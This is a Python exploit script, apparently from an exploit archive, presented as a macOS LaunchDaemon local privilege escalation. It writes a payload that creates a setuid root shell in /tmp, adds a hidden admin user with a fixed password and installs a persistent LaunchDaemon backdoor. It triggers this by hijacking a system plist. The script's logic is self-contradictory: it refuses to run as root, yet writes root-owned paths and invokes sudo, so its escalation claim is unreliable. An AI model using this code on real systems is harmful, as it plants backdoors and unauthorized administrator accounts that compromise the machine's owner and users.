📄 macOS / iOS Local Privilege Escalation

#!/usr/bin/env python3
    # Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
    # Author: Mohammed Idrees Banyamer (@banyamer_security)
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-05-31
    # Tested on: macOS Sonoma (14.x ARM64 / x86_64)
    # CVE: CVE-2025-24085
    # Type: Local Privilege Escalation
    # Platform: macOS
    # Author Country: Jordan
    # Description: 
    # This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
    # arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
    # creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the 
    # com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root 
    # on macOS Sonoma systems.
    
    import os
    import plistlib
    import time
    from pathlib import Path
    
    LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
    PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
    
    def create_payload():
        print("[+] Creating root payload script...")
        payload = """#!/bin/bash
    # Root shell
    cp /bin/bash /tmp/.rootbash
    chmod +s /tmp/.rootbash
    chown root:wheel /tmp/.rootbash
    
    # Add admin user
    sysadminctl -addUser pentest -password macOS123! -admin
    
    # Log file
    echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
    
    # Persistent backdoor
    cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
    "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
      <key>Label</key><string>com.apple.backdoor</string>
      <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
      <key>RunAtLoad</key><true/>
    </dict>
    </plist>
    EOF
    chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
    chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
    """
        with open(PAYLOAD_SCRIPT, "w") as f:
            f.write(payload)
        os.chmod(PAYLOAD_SCRIPT, 0o755)
    
    def hijack_launchdaemon():
        print("[+] Hijacking LaunchDaemon plist...")
        if not Path(LAUNCHD_PLIST).exists():
            # create a fake one
            print("[*] Creating fake LaunchDaemon plist for exploitation...")
            plist_data = {
                'Label': 'com.apple.securemonitor',
                'ProgramArguments': [PAYLOAD_SCRIPT],
                'RunAtLoad': True,
            }
            with open(LAUNCHD_PLIST, "wb") as f:
                plistlib.dump(plist_data, f)
        else:
            # hijack existing one
            with open(LAUNCHD_PLIST, 'rb') as f:
                plist = plistlib.load(f)
            plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
            plist['RunAtLoad'] = True
            with open(LAUNCHD_PLIST, 'wb') as f:
                plistlib.dump(plist, f)
    
        os.system(f"chmod 644 {LAUNCHD_PLIST}")
        os.system(f"chown root:wheel {LAUNCHD_PLIST}")
    
    def trigger_payload():
        print("[+] Triggering LaunchDaemon manually...")
        os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
        print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
    
    def main():
        if os.geteuid() == 0:
            print("[!] You are already root. No need to exploit.")
            return
        create_payload()
        hijack_launchdaemon()
        print("[+] Exploit completed. Reboot or run manually:")
        print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
        print("    Then run: /tmp/.rootbash -p")
    
    if __name__ == "__main__":
        main()